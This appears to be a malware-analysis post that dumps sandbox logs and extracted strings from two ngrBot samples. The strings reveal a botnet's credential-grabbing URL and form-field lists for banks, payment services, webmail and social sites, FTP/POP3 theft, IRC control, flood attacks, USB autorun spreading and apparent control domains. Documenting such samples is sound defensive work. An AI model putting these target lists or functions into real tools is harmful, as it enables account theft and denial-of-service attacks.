Large ngrBot server hosted in Germany
Here you have the strings from 2 executable samples.
30upjmrlzz.exe
Processes: PID ParentPID User Path -------------------------------------------------- 2872 1236 C:Documents and SettingsMes documents30upjmrlzz.exe Ports: Port PID Type Path -------------------------------------------------- Explorer Dlls: DLL Path Company Name File Description -------------------------------------------------- No changes Found IE Dlls: DLL Path Company Name File Description -------------------------------------------------- No changes Found Loaded Drivers: Driver File Company Name Description -------------------------------------------------- Monitored RegKeys Registry Key Value -------------------------------------------------- Kernel31 Api Log -------------------------------------------------- ***** Installing Hooks ***** 719f74df RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters) 719f80c4 RegOpenKeyExA (Protocol_Catalog9) 719f777e RegOpenKeyExA (00000095) 719f764d RegOpenKeyExA (Catalog_Entries) 719f7cea RegOpenKeyExA (000000000001) 719f7cea RegOpenKeyExA (000000000002) 719f7cea RegOpenKeyExA (000000000003) 719f7cea RegOpenKeyExA (000000000004) 719f7cea RegOpenKeyExA (000000000005) 719f7cea RegOpenKeyExA (000000000006) 719f7cea RegOpenKeyExA (000000000007) 719f7cea RegOpenKeyExA (000000000008) 719f7cea RegOpenKeyExA (000000000009) 719f7cea RegOpenKeyExA (000000000010) 719f7cea RegOpenKeyExA (000000000011) 719f7cea RegOpenKeyExA (000000000012) 719f7cea RegOpenKeyExA (000000000013) 719f7cea RegOpenKeyExA (000000000014) 719f7cea RegOpenKeyExA (000000000015) 719f7cea RegOpenKeyExA (000000000016) 719f7cea RegOpenKeyExA (000000000017) 719f7cea RegOpenKeyExA (000000000018) 719f7cea RegOpenKeyExA (000000000019) 719f2623 WaitForSingleObject(77c,0) 719f87c6 RegOpenKeyExA (NameSpace_Catalog5) 719f777e RegOpenKeyExA (00000039) 719f835b RegOpenKeyExA (Catalog_Entries) 719f84ef RegOpenKeyExA (000000000001) 719f84ef RegOpenKeyExA (000000000002) 719f84ef RegOpenKeyExA (000000000003) 719f84ef RegOpenKeyExA (000000000004) 719f2623 
WaitForSingleObject(774,0) 719e1af2 RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters) 719e198e GlobalAlloc() 7c80b72f ExitThread() 7d2454bb LoadLibraryA(KERNEL32.DLL)=7c800000 7d2454bb LoadLibraryA(MSVBVM60.DLL )=73370000 73371c38 GetCommandLineA() 73372f57 CreateMutex((null)) 7d23eab5 WaitForSingleObject(764,7530) 410de8 LoadLibraryA(KERNEL32.DLL)=7c800000 410de8 LoadLibraryA(MSVBVM60.DLL )=73370000 733739f4 GetCommandLineA() 7338d1b3 LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0 7337452c GetVersionExA() 7337476c LoadLibraryA(OLEAUT32.DLL)=770e0000 772370b9 GetVersionExA() 7723711c GetCommandLineA() 7337476c LoadLibraryA(SXS.DLL)=77210000 774efa66 LoadLibraryA(oleaut32.dll)=770e0000 73376792 RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors) 77daeff6 RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors) 770fc957 LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000 7337a15b LoadLibraryA(kernel32.dll)=7c800000 406f1e LoadLibraryA(kernel32)=7c800000 7337a15b LoadLibraryA(kernel32)=7c800000 7337a15b LoadLibraryA(USER32)=7e390000 7345d09c CreateFileA(C:Documents and SettingsMes documents30upjmrlzz.exe) 7345d34f ReadFile() 406f1e LoadLibraryA(NTDLL)=7c910000 7c8165b3 WaitForSingleObject(74c,64) 7c8191f8 LoadLibraryA(advapi32.dll)=77da0000 7337a4c5 GetCurrentProcessId()=1236 7337bdfa RegOpenKeyExA (HKLMSoftwareMicrosoftWindows) 7337be1c RegOpenKeyExA (HTML Help) 7337be1c RegOpenKeyExA (Help) 7337c9ce WaitForSingleObject(7e4,ffffffff) 73373657 ExitProcess() ***** Injected Process Terminated ***** DirwatchData -------------------------------------------------- WatchDir Initilized OK Watching C:DOCUME~1LOCALS~1Temp Watching C:WINDOWS Watching C:Program Files Created: C:WINDOWSPrefetch30UPJMRLZZ.EXE-2CE4436A.pf Modifed: C:WINDOWSPrefetch30UPJMRLZZ.EXE-2CE4436A.pf Created: C:DOCUME~1zezakLOCALS~1TempJET501A.tmp Created: C:DOCUME~1zezakLOCALS~1TempJET2F.tmp Deteled: C:DOCUME~1zezakLOCALS~1TempJET2F.tmp Deteled: C:DOCUME~1zezakLOCALS~1TempJET501A.tmp File: 
30upjmrlzz.exe Size: 116236 Bytes MD5: AB7DDF19DE425E6439160DD343B391E1 Packer: File not found C:iDEFENSESysAnalyzerpeid.exe File Properties: CompanyName H3 7H FileDescription FileVersion 43.34.0003 InternalName 1 LegalCopyright OriginalFilename ProductName 4H37H ProductVersion Exploit Signatures: --------------------------------------------------------------------------- Scanning for 19 signatures Scan Complete: 312Kb in 0,031 seconds Urls -------------------------------------------------- http://%s/%s http://%s/ http:// http://api.wipmania.com/ftp://%s:%s@%s:%d RegKeys -------------------------------------------------- gdatasoftware. sunbeltsoftware. SoftwareMicrosoftWindowsCurrentVersionRun SoftwareMicrosoftWindowsCurrentVersionRun SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem .DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun ExeRefs -------------------------------------------------- File: 30upjmrlzz_dmp.exe_ .exe %windir%system32cmd.exe &&%%windir%%explorer.exe %%cd%%%s %0x.exe Internet Exploreriexplore.exe pidgin.exe wlcomm.exe msnmsgr.exe msmsgs.exe opera.exe chrome.exe ieuser.exe iexplore.exe firefox.exe .ipconfig.exe verclsid.exe regedit.exe rundll32.exe cmd.exe regsvr32.exe .exe lol.exe winlogon.exe explorer.exe y%s%s.exe lsass.exe Raw Strings: -------------------------------------------------- File: 30upjmrlzz_dmp.exe_ MD5: 20355b2f65c907536ac74b1c4cae1189 Size: 319490 Ascii Strings: --------------------------------------------------------------------------- !This program cannot be run in DOS mode. 
%s.%s pdef %s.%S %s.Blocked "%s" from removing our bot file! %s.Blocked "%S" from removing our bot file! block bdns CreateFileW 0123456789ABCDEF i.root-servers.org %s.Blocked "%s" from moving our bot file %s.Blocked "%S" from moving our bot file %s.p10-> Message hijacked! %s.p10-> Message to %s hijacked! %s.p21-> Message hijacked! msnmsg msnint baddr X-MMS-IM-Format: CAL %d %256s msnu Done frst ngr->blocksize: %d block_size: %d NtFreeVirtualMemory NtAllocateVirtualMemory NtQuerySystemInformation LdrEnumerateLoadedModules NtQueryInformationProcess LdrGetProcedureAddress NtQueryVirtualMemory LdrLoadDll NtQueryInformationThread LdrGetDllHandle RtlAnsiStringToUnicodeString .pipe%s kernel32.dll GetNativeSystemInfo %s_%d %s_0 %s-Mutex SeDebugPrivilege ntdll.dll NtGetNextProcess %s-pid %s-comm NtResumeThread PONG JOIN # PRIVMSG # %s.Blocked "%S" from creating "%S" %s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot! .exe %s.Detected process "%S" sending an IRC packet to server %s:%d. %s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s). PRIVMSG %255s JOIN %255s PRIVMSG JOIN %s:%d NtSetInformationProcess %s.%s%s %S%s%s HKCU HKLM %s.%S%S %S%S%S state_%s %s.%s (p='%S') pop3://%s:%s@%s:%d popgrab %s:%s@%s:%d anonymous ftp://%s:%s@%s:%d ftpgrab %s.%s ->> %s (%s : %s) %s.%s ->> %s : %s Directadmin WHCMS cPanel blog %s-%s-%s ffgrab iegrab %s.Blocked possible browser exploit pack call on URL '%s' %s.Blocked possible browser exploit pack call on URL '%S' webroot. fortinet. virusbuster.nprotect. gdatasoftware. virus. precisesecurity. 
lavasoft. heck.tc emsisoft. onlinemalwarescanner. onecare.live. f-secure. bullguard. clamav. pandasecurity. sophos. malwarebytes. sunbeltsoftware. norton. norman. mcafee. symantec comodo. avast. avira. avg. bitdefender. eset. kaspersky. trendmicro. iseclab. virscan. garyshood. viruschief. jotti. threatexpert. novirusthanks. virustotal. login[password] login[username] *members*.iknowthatgirl*/members* IKnowThatGirl *youporn.*/login* YouPorn *members.brazzers.com* Brazzers clave numeroTarjeta *clave=* *bcointernacional*login* Bcointernacional *:2222/CMD_LOGIN* *whcms*dologin* *:2086/login* *:2083/login* *:2082/login* *webnames.ru/*user_login* Webnames *dotster.com/*login* Dotster loginid *enom.com/login* Enom login.Pass login.User *login.Pass=* *1and1.com/xml/config* 1and1 token *moniker.com/*Login* Moniker LoginPassword LoginUserName *LoginPassword=* *namecheap.com/*login* Namecheap loginname *godaddy.com/login* Godaddy Password EmailName *Password=* *alertpay.com/login* Alertpay *netflix.com/*ogin* Netflix *thepiratebay.org/login* Thepiratebay *torrentleech.org/*login* Torrentleech *vip-file.com/*/signin-do* Vip-file *pas=* *sms4file.com/*/signin-do* Sms4file *letitbit.net* Letitbit *what.cd/login* Whatcd *oron.com/login* Oron *filesonic.com/*login* Filesonic *speedyshare.com/login* Speedyshare *pw=* *uploaded.to/*login* Uploaded *uploading.com/*login* Uploading loginUserPassword loginUserName *loginUserPassword=* *fileserv.com/login* Fileserve *hotfile.com/login* Hotfile *4shared.com/login* 4shared txtpass txtuser *txtpass=* *netload.in/index* Netload *freakshare.com/login* Freakshare login_pass *login_pass=* *mediafire.com/*login* Mediafire *sendspace.com/login* Sendspace *megaupload.*/*login* Megaupload *depositfiles.*/*/login* Depositfiles userid *signin.ebay*SignIn eBay *officebanking.cl/*login.asp* OfficeBanking *secure.logmein.*/*logincheck* LogMeIn session[password] session[username_or_email] *password]=* *twitter.com/sessions Twitter txtPassword txtEmail 
*&txtPassword=* *.moneybookers.*/*login.pl Moneybookers *runescape*/*weblogin* Runescape *dyndns*/account* DynDNS *&password=* *no-ip*/login* NoIP *steampowered*/login* Steam quick_password quick_username username *hackforums.*/member.php Hackforums email *facebook.*/login.php* Facebook *login.yahoo.*/*login* Yahoo passwd login *passwd=* *login.live.*/*post.srf* Live TextfieldPassword TextfieldEmail *TextfieldPassword=* *gmx.*/*FormLogin* *Passwd=* Gmail FLN-Password FLN-UserName *FLN-Password=* *fastmail.*/mail/* Fastmail pass user *pass=* *bigstring.*/*index.php* BigString screenname *screenname.aol.*/login.psp* password loginId *password=* *aol.*/*login.psp* Passwd Email *service=youtube* *google.*/*ServiceLoginAuth* YouTube login_password login_email *login_password=* *paypal.*/webscr?cmd=_login-submit* PayPal %s / ?%d HTTP/1.1 Host: %s User-Agent: %s Keep-Alive: 300 Connection: keep-alive Content-Length: 42 POST Mozilla/4.0 Connection: Close X-a: b .PHYSICALDRIVE0 00100 SeShutdownPrivilege NtShutdownSystem This binary is invalid. Main reasons: - you stupid cracker - you stupid cracker... - you stupid cracker?! 
ngrBot Error shell32.dll http httpi usbi dnsapi.dll DnsFlushResolverCache http://%s/%s http://%s/ HTTP Host: POST /%1023s {%s|%s%s}%s n%s{%s|%s%s}%s <br> admin isadmin %s|%s|%s [DNS]: Redirecting "%s" to "%s" disabled enabled %s|%s [Logins]: Cleared %d logins #user #admin #new removing exiting reconnecting MOTD bsod disable POP3 -> FTP -> [d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s) dlds http:// rebooting [Login]: %s [DNS]: Blocked %d domain(s) - Redirected %d domain(s) [Speed]: Estimated upload speed %d KB/s SoftwareMicrosoftWindowsCurrentVersionRun ngrBot running IPC_Check shellopencommand= shellexplorecommand= icon=shell32.dll,7 useautoplay=1 action=Open folder to view files shellexecute= [autorun] .lnk %windir%system32cmd.exe &&%%windir%%explorer.exe %%cd%%%s /c "start %%cd%%RECYCLER%s RECYCLER .inf %s%s .%c: %s%s %sautorun.tmp %sautorun.inf %c: gdkWindowToplevelClass %0x.exe comment-text *bebo.*/c/home/ajax_post_lifestream_comment bebo Lifestream *bebo.*/c/profile/comment_post.json bebo Comment Message *bebo.*/mail/MailCompose.jsp* bebo Message *friendster.*/sendmessage.php* Friendster Message comment Friendster Comment shoutout *friendster.*/rpc.php Friendster Shoutout *vkontakte.ru/mail.php vkontakte Message *vkontakte.ru/wall.php vkontakte Wall message *vkontakte.ru/api.php vkontakte Chat text *twitter.*/*direct_messages/new* Twitter Message *twitter.*/*status*/update* Twitter Tweet status *facebook.*/ajax/*MessageComposerEndpoint.php* Facebook Message msg_text *facebook.*/ajax/chat/send.php* Facebook IM -_.!~*'() Content-Length: %s.%s hijacked! 
MSG %d %s %d MSG %d %1s SDG %d %d Reliability: From: Content-Length: %d X-MMS-IM-Format: SDG %d bmsn %s_0x%08X RegCreateKeyExW RegCreateKeyExA URLDownloadToFileW URLDownloadToFileA PR_Write DnsQuery_W DnsQuery_A InternetWriteFile HttpSendRequestW HttpSendRequestA GetAddrInfoW send CreateFileA MoveFileW MoveFileA DeleteFileW DeleteFileA CopyFileW CopyFileA NtQueryDirectoryFile NtEnumerateValueKey %08x OPEN DnsFree DnsQuery_A DNSAPI.dll FreeContextBuffer InitializeSecurityContextW FreeCredentialsHandle DeleteSecurityContext QueryContextAttributesW AcquireCredentialsHandleW EncryptMessage DecryptMessage InitializeSecurityContextA ApplyControlToken Secur32.dll SHGetSpecialFolderPathW SHGetFileInfoA ShellExecuteA SHELL32.dll InternetCloseHandle InternetReadFile InternetQueryDataAvailable HttpQueryInfoA InternetOpenUrlA InternetOpenA HttpQueryInfoW InternetQueryOptionW WININET .dll PathAppendW StrStrIA PathAppendA PathFindExtensionA SHLWAPI.dll WS2_32.dll memset wcsstr strstr wcsrchr ??3@YAXPAX@Z atoi sscanf _strcmpi printf _snprintf sprintf strncpy _memicmp _wcsnicmp _vsnprintf _stricmp strtok strchr _snwprintf ??2@YAPAXI@Z _strnicmp isxdigit memmove strncmp toupper strrchr vsprintf isalnum strncat MSVCRT.dll lstrcpyA MoveFileExA lstrcmpA WideCharToMultiByte MoveFileExW lstrcmpW ExitThread MultiByteToWideChar GetFileAttributesA SetFileAttributesW GetFileAttributesW LoadLibraryW CloseHandle SetFileTime CreateFileW GetFileTime GetSystemTimeAsFileTime WriteFile GetModuleHandleW GetLastError ReadFile GetTickCount HeapAlloc GetProcessHeap HeapFree lstrlenA Sleep WriteProcessMemory ReadProcessMemory InitializeCriticalSection LeaveCriticalSection EnterCriticalSection HeapReAlloc SetEvent ConnectNamedPipe CreateNamedPipeA CreateEventA DisconnectNamedPipe GetOverlappedResult WaitForMultipleObjects CreateFileA VirtualFreeEx VirtualAllocEx IsWow64Process CreateRemoteThread OpenProcess WaitForSingleObject ReleaseMutex MapViewOfFile OpenFileMappingA CreateFileMappingA 
InterlockedIncrement UnmapViewOfFile CreateMutexA GetVersionExA GetModuleFileNameW InterlockedCompareExchange CreateThread GetWindowsDirectoryW DeleteFileW GetTempFileNameW lstrcatW lstrcpynW DeleteFileA SetFileAttributesA lstrcpyW LocalFree LocalAlloc lstrcpynA SetFilePointer DeviceIoControl VirtualAlloc CreateProcessW ExitProcess lstrcatA GetVolumeInformationW GetLocaleInfoA FlushFileBuffers CopyFileW FindClose FindNextFileA FindFirstFileA SetCurrentDirectoryA LockFile GetFileSize CreateDirectoryA GetLogicalDriveStringsA OpenMutexA GetModuleFileNameA GetWindowsDirectoryA KERNEL32.dll MessageBoxA wvsprintfA wsprintfW DefWindowProcA DispatchMessageA TranslateMessage GetMessageA RegisterDeviceNotificationA CreateWindowExA RegisterClassExA USER32.dll CryptGetHashParam CryptDestroyHash CryptHashData CryptReleaseContext CryptCreateHash CryptAcquireContextA AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken RegCloseKey RegSetValueExW RegCreateKeyExW RegNotifyChangeKeyValue RegSetValueExA RegOpenKeyExA ADVAPI32.dll CoCreateInstance CoInitialize ole32.dll 
lalorlz1.info ROCKR rlz1lola.info ROCKR rlz01jm.info ROCKR #ROCK ngrBot ELPERRO ]1.1.0.0 CUSTOMER FvLQ49IlzIyLjj6m msn.set msn.int http.set http.int http.inj mdns stats speed logins slow ssyn stop F4XA gGWHXA 5hXA ZpXA ` WA f0WA u{A<WA [@WA PASS %s [.ShellClassInfo] CLSID={645FF040-5081-101B-9F08-00AA002F954E} USER %s 0 0 :%s NICK %s JOIN %s %s PART %s PRIVMSG %s :%s QUIT :%s PONG %s PING PRIVMSG [v="%s" c="%s" h="%s" p="%S"] [d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d [d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d [Slowloris]: Starting flood on "%s" for %d minute(s) [Slowloris]: Finished flood on "%s" [UDP]: Starting flood on "%s:%d" for %d second(s) [UDP]: Finished flood on "%s:%d" [SYN]: Starting flood on "%s:%d" for %d second(s) [SYN]: Finished flood on "%s:%d" [USB]: Infected %s [MSN]: Updated MSN spread message to "%s" [MSN]: Updated MSN spread interval to "%s" [HTTP]: Updated HTTP spread message to "%s" [HTTP]: Injected value is now %s. [HTTP]: Updated HTTP spread interval to "%s" [Visit]: Visited "%s" [DNS]: Blocked "%s" [usb="%d" msn="%d" http="%d" total="%d"] [ftp="%d" pop="%d" http="%d" total="%d"] [RSOCK4]: Started rsock4 on "%s:%d" [RSOCK4]: Stopped rsock4 [d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s) [d="%s"] Error downloading file [e="%d"] [d="%s"] Error writing download to "%S" [e="%d"] [d="%s" s="%d bytes"] Error creating process "%S" [e="%d"] [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"] [d="%s"] Error getting temporary filename. 
[e="%d"] [d='%s"] Error getting application data path [e="%d"] [Visit]: Error visitng "%s" [FTP Login]: %s [POP3 Login]: %s [FTP Infect]: %s was iframed [HTTP Login]: %s [HTTP Traffic]: %s [Ruskill]: Detected File: "%s" [Ruskill]: Detected DNS: "%s" [Ruskill]: Detected Reg: "%s" [PDef+]: %s [DNS]: Blocked DNS "%s" [MSN]: %s [HTTP]: %s ftplog poplog ftpinfect httplogin httptraff ruskill rdns rreg httpspread http://api.wipmania.com/ .pipe%08x_ipc 
Unicode Strings: --------------------------------------------------------------------------- DBWIN .pipe kernel32.dll ntdll.dll Internet Exploreriexplore.exe autorun.inf pidgin.exe wlcomm.exe msnmsgr.exe msmsgs.exe flock.ex opera.exe chrome.exe ieuser.exe iexplore.exe firefox.exe HKCU HKLM Microsoft Unified Security Protocol Provider .ipconfig.exe verclsid.exe regedit.exe rundll32.exe cmd.exe regsvr32.exe l"%s" %S POST .exe lol.exe n127.0.0.1 %s:Zone.Identifier wininet.dll secur32.dll ws2_32.dll :%S%SDesktop.ini winlogon.exe explorer.exe Aadvapi32.dll urlmon.dll nspr4.dll dnsapi.dll Akernel23.dll y%s%s.exe lsass.exe Shell SoftwareMicrosoftWindowsCurrentVersionRun 
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem .DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun
31upjmrlzz.exe
Processes: PID ParentPID User Path -------------------------------------------------- 768 1176 C:Documents and SettingsMes documents31upjmrlzz.exe Ports: Port PID Type Path -------------------------------------------------- Explorer Dlls: DLL Path Company Name File Description -------------------------------------------------- No changes Found IE Dlls: DLL Path Company Name File Description -------------------------------------------------- No changes Found Loaded Drivers: Driver File Company Name Description -------------------------------------------------- Monitored RegKeys Registry Key Value -------------------------------------------------- Kernel31 Api Log -------------------------------------------------- ***** Installing Hooks ***** 719f74df RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters) 719f80c4 RegOpenKeyExA (Protocol_Catalog9) 719f777e RegOpenKeyExA (00000095) 719f764d RegOpenKeyExA (Catalog_Entries) 719f7cea RegOpenKeyExA (000000000001) 719f7cea RegOpenKeyExA (000000000002) 719f7cea RegOpenKeyExA (000000000003) 719f7cea RegOpenKeyExA (000000000004) 719f7cea RegOpenKeyExA (000000000005) 719f7cea RegOpenKeyExA (000000000006) 719f7cea RegOpenKeyExA (000000000007) 719f7cea RegOpenKeyExA (000000000008) 719f7cea RegOpenKeyExA (000000000009) 719f7cea RegOpenKeyExA (000000000010) 719f7cea RegOpenKeyExA (000000000011) 719f7cea RegOpenKeyExA (000000000012) 719f7cea RegOpenKeyExA (000000000013) 719f7cea RegOpenKeyExA (000000000014) 719f7cea RegOpenKeyExA (000000000015) 719f7cea RegOpenKeyExA (000000000016) 719f7cea RegOpenKeyExA (000000000017) 719f7cea RegOpenKeyExA (000000000018) 719f7cea RegOpenKeyExA (000000000019) 719f2623 WaitForSingleObject(77c,0) 719f87c6 RegOpenKeyExA (NameSpace_Catalog5) 719f777e RegOpenKeyExA (00000039) 719f835b RegOpenKeyExA (Catalog_Entries) 719f84ef RegOpenKeyExA (000000000001) 719f84ef RegOpenKeyExA (000000000002) 719f84ef RegOpenKeyExA (000000000003) 719f84ef RegOpenKeyExA (000000000004) 719f2623 
WaitForSingleObject(774,0) 719e1af2 RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters) 719e198e GlobalAlloc() 7c80b72f ExitThread() 7d2454bb LoadLibraryA(KERNEL32.DLL)=7c800000 7d2454bb LoadLibraryA(MSVBVM60.DLL )=73370000 73371c38 GetCommandLineA() 73372f57 CreateMutex((null)) 7d23eab5 WaitForSingleObject(764,7530) 410df8 LoadLibraryA(KERNEL32.DLL)=7c800000 410df8 LoadLibraryA(MSVBVM60.DLL )=73370000 733739f4 GetCommandLineA() 7338d1b3 LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0 7337452c GetVersionExA() 7337476c LoadLibraryA(OLEAUT32.DLL)=770e0000 772370b9 GetVersionExA() 7723711c GetCommandLineA() 7337476c LoadLibraryA(SXS.DLL)=77210000 774efa66 LoadLibraryA(oleaut32.dll)=770e0000 73376792 RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors) 77daeff6 RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors) 770fc957 LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000 7337a15b LoadLibraryA(kernel32.dll)=7c800000 406f1e LoadLibraryA(kernel32)=7c800000 7337a15b LoadLibraryA(kernel32)=7c800000 7337a15b LoadLibraryA(USER32)=7e390000 7345d09c CreateFileA(C:Documents and SettingsMes documents31upjmrlzz.exe) 7345d34f ReadFile() 406f1e LoadLibraryA(NTDLL)=7c910000 7c8165b3 WaitForSingleObject(74c,64) 7c8191f8 LoadLibraryA(advapi32.dll)=77da0000 7337a4c5 GetCurrentProcessId()=1176 7337bdfa RegOpenKeyExA (HKLMSoftwareMicrosoftWindows) 7337be1c RegOpenKeyExA (HTML Help) 7337be1c RegOpenKeyExA (Help) 7337c9ce WaitForSingleObject(7e4,ffffffff) 73373657 ExitProcess() ***** Injected Process Terminated ***** DirwatchData -------------------------------------------------- WatchDir Initilized OK Watching C:DOCUME~1LOCALS~1Temp Watching C:WINDOWS Watching C:Program Files Created: C:WINDOWSPrefetch31UPJMRLZZ.EXE-1EE360EA.pf Modifed: C:WINDOWSPrefetch31UPJMRLZZ.EXE-1EE360EA.pf Created: C:DOCUME~1zezakLOCALS~1TempJET49CB.tmp Created: C:DOCUME~1zezakLOCALS~1TempJET37.tmp Deteled: C:DOCUME~1zezakLOCALS~1TempJET37.tmp Deteled: C:DOCUME~1zezakLOCALS~1TempJET49CB.tmp File: 
31upjmrlzz.exe Size: 116236 Bytes MD5: 9702091B21C1A48955A5268D07E31EF6 Packer: File not found C:iDEFENSESysAnalyzerpeid.exe File Properties: CompanyName FileDescription FileVersion InternalName LegalCopyright OriginalFilename ProductName ProductVersion Exploit Signatures: --------------------------------------------------------------------------- Scanning for 19 signatures Scan Complete: 312Kb in 0,032 seconds Urls -------------------------------------------------- http://%s/%s http://%s/ http:// http://api.wipmania.com/ftp://%s:%s@%s:%d RegKeys -------------------------------------------------- gdatasoftware. sunbeltsoftware. SoftwareMicrosoftWindowsCurrentVersionRun SoftwareMicrosoftWindowsCurrentVersionRun SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem .DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun ExeRefs -------------------------------------------------- File: 31upjmrlzz_dmp.exe_ .exe %windir%system32cmd.exe &&%%windir%%explorer.exe %%cd%%%s %0x.exe Internet Exploreriexplore.exe pidgin.exe wlcomm.exe msnmsgr.exe msmsgs.exe opera.exe chrome.exe ieuser.exe iexplore.exe firefox.exe .ipconfig.exe verclsid.exe regedit.exe rundll32.exe cmd.exe regsvr32.exe .exe lol.exe winlogon.exe explorer.exe y%s%s.exe lsass.exe Raw Strings: -------------------------------------------------- File: 31upjmrlzz_dmp.exe_ MD5: 42157d0a769f0335830e4646c6a00338 Size: 319490 Ascii Strings: --------------------------------------------------------------------------- !This program cannot be run in DOS mode. 
ngrBot Error shell32.dll http httpi usbi dnsapi.dll DnsFlushResolverCache http://%s/%s http://%s/ HTTP Host: POST /%1023s {%s|%s%s}%s n%s{%s|%s%s}%s <br> admin isadmin %s|%s|%s [DNS]: Redirecting "%s" to "%s" disabled enabled %s|%s [Logins]: Cleared %d logins #user #admin #new removing exiting reconnecting MOTD bsod disable POP3 -> FTP -> [d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s) dlds http:// rebooting [Login]: %s [DNS]: Blocked %d domain(s) - Redirected %d domain(s) [Speed]: Estimated upload speed %d KB/s SoftwareMicrosoftWindowsCurrentVersionRun ngrBot running IPC_Check shellopencommand= shellexplorecommand= icon=shell32.dll,7 useautoplay=1 action=Open folder to view files shellexecute= [autorun] .lnk %windir%system32cmd.exe &&%%windir%%explorer.exe %%cd%%%s /c "start %%cd%%RECYCLER%s RECYCLER .inf %s%s .%c: %s%s %sautorun.tmp %sautorun.inf %c: gdkWindowToplevelClass %0x.exe comment-text *bebo.*/c/home/ajax_post_lifestream_comment bebo Lifestream *bebo.*/c/profile/comment_post.json bebo Comment Message *bebo.*/mail/MailCompose.jsp* bebo Message *friendster.*/sendmessage.php* Friendster Message comment Friendster Comment shoutout *friendster.*/rpc.php Friendster Shoutout *vkontakte.ru/mail.php vkontakte Message *vkontakte.ru/wall.php vkontakte Wall message *vkontakte.ru/api.php vkontakte Chat text *twitter.*/*direct_messages/new* Twitter Message *twitter.*/*status*/update* Twitter Tweet status *facebook.*/ajax/*MessageComposerEndpoint.php* Facebook Message msg_text *facebook.*/ajax/chat/send.php* Facebook IM -_.!~*'() Content-Length: %s.%s hijacked! 
MSG %d %s %d MSG %d %1s SDG %d %d Reliability: From: Content-Length: %d X-MMS-IM-Format: SDG %d bmsn %s_0x%08X RegCreateKeyExW RegCreateKeyExA URLDownloadToFileW URLDownloadToFileA PR_Write DnsQuery_W DnsQuery_A InternetWriteFile HttpSendRequestW HttpSendRequestA GetAddrInfoW send CreateFileA MoveFileW MoveFileA DeleteFileW DeleteFileA CopyFileW CopyFileA NtQueryDirectoryFile NtEnumerateValueKey %08x OPEN DnsFree DnsQuery_A DNSAPI.dll FreeContextBuffer InitializeSecurityContextW FreeCredentialsHandle DeleteSecurityContext QueryContextAttributesW AcquireCredentialsHandleW EncryptMessage DecryptMessage InitializeSecurityContextA ApplyControlToken Secur32.dll SHGetSpecialFolderPathW SHGetFileInfoA ShellExecuteA SHELL32.dll InternetCloseHandle InternetReadFile InternetQueryDataAvailable HttpQueryInfoA InternetOpenUrlA InternetOpenA HttpQueryInfoW InternetQueryOptionW WININET .dll PathAppendW StrStrIA PathAppendA PathFindExtensionA SHLWAPI.dll WS2_32.dll memset wcsstr strstr wcsrchr ??3@YAXPAX@Z atoi sscanf _strcmpi printf _snprintf sprintf strncpy _memicmp _wcsnicmp _vsnprintf _stricmp strtok strchr _snwprintf ??2@YAPAXI@Z _strnicmp isxdigit memmove strncmp toupper strrchr vsprintf isalnum strncat MSVCRT.dll lstrcpyA MoveFileExA lstrcmpA WideCharToMultiByte MoveFileExW lstrcmpW ExitThread MultiByteToWideChar GetFileAttributesA SetFileAttributesW GetFileAttributesW LoadLibraryW CloseHandle SetFileTime CreateFileW GetFileTime GetSystemTimeAsFileTime WriteFile GetModuleHandleW GetLastError ReadFile GetTickCount HeapAlloc GetProcessHeap HeapFree lstrlenA Sleep WriteProcessMemory ReadProcessMemory InitializeCriticalSection LeaveCriticalSection EnterCriticalSection HeapReAlloc SetEvent ConnectNamedPipe CreateNamedPipeA CreateEventA DisconnectNamedPipe GetOverlappedResult WaitForMultipleObjects CreateFileA VirtualFreeEx VirtualAllocEx IsWow64Process CreateRemoteThread OpenProcess WaitForSingleObject ReleaseMutex MapViewOfFile OpenFileMappingA CreateFileMappingA 
InterlockedIncrement UnmapViewOfFile CreateMutexA GetVersionExA GetModuleFileNameW InterlockedCompareExchange CreateThread GetWindowsDirectoryW DeleteFileW GetTempFileNameW lstrcatW lstrcpynW DeleteFileA SetFileAttributesA lstrcpyW LocalFree LocalAlloc lstrcpynA SetFilePointer DeviceIoControl VirtualAlloc CreateProcessW ExitProcess lstrcatA GetVolumeInformationW GetLocaleInfoA FlushFileBuffers CopyFileW FindClose FindNextFileA FindFirstFileA SetCurrentDirectoryA LockFile GetFileSize CreateDirectoryA GetLogicalDriveStringsA OpenMutexA GetModuleFileNameA GetWindowsDirectoryA KERNEL32.dll MessageBoxA wvsprintfA wsprintfW DefWindowProcA DispatchMessageA TranslateMessage GetMessageA RegisterDeviceNotificationA CreateWindowExA RegisterClassExA USER32.dll CryptGetHashParam CryptDestroyHash CryptHashData CryptReleaseContext CryptCreateHash CryptAcquireContextA AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken RegCloseKey RegSetValueExW RegCreateKeyExW RegNotifyChangeKeyValue RegSetValueExA RegOpenKeyExA ADVAPI32.dll CoCreateInstance CoInitialize ole32.dll n;^ Qkkbal i]Wb 9a&g MGiI wn>Jj #.zf +o*7 !!!!!!!! 
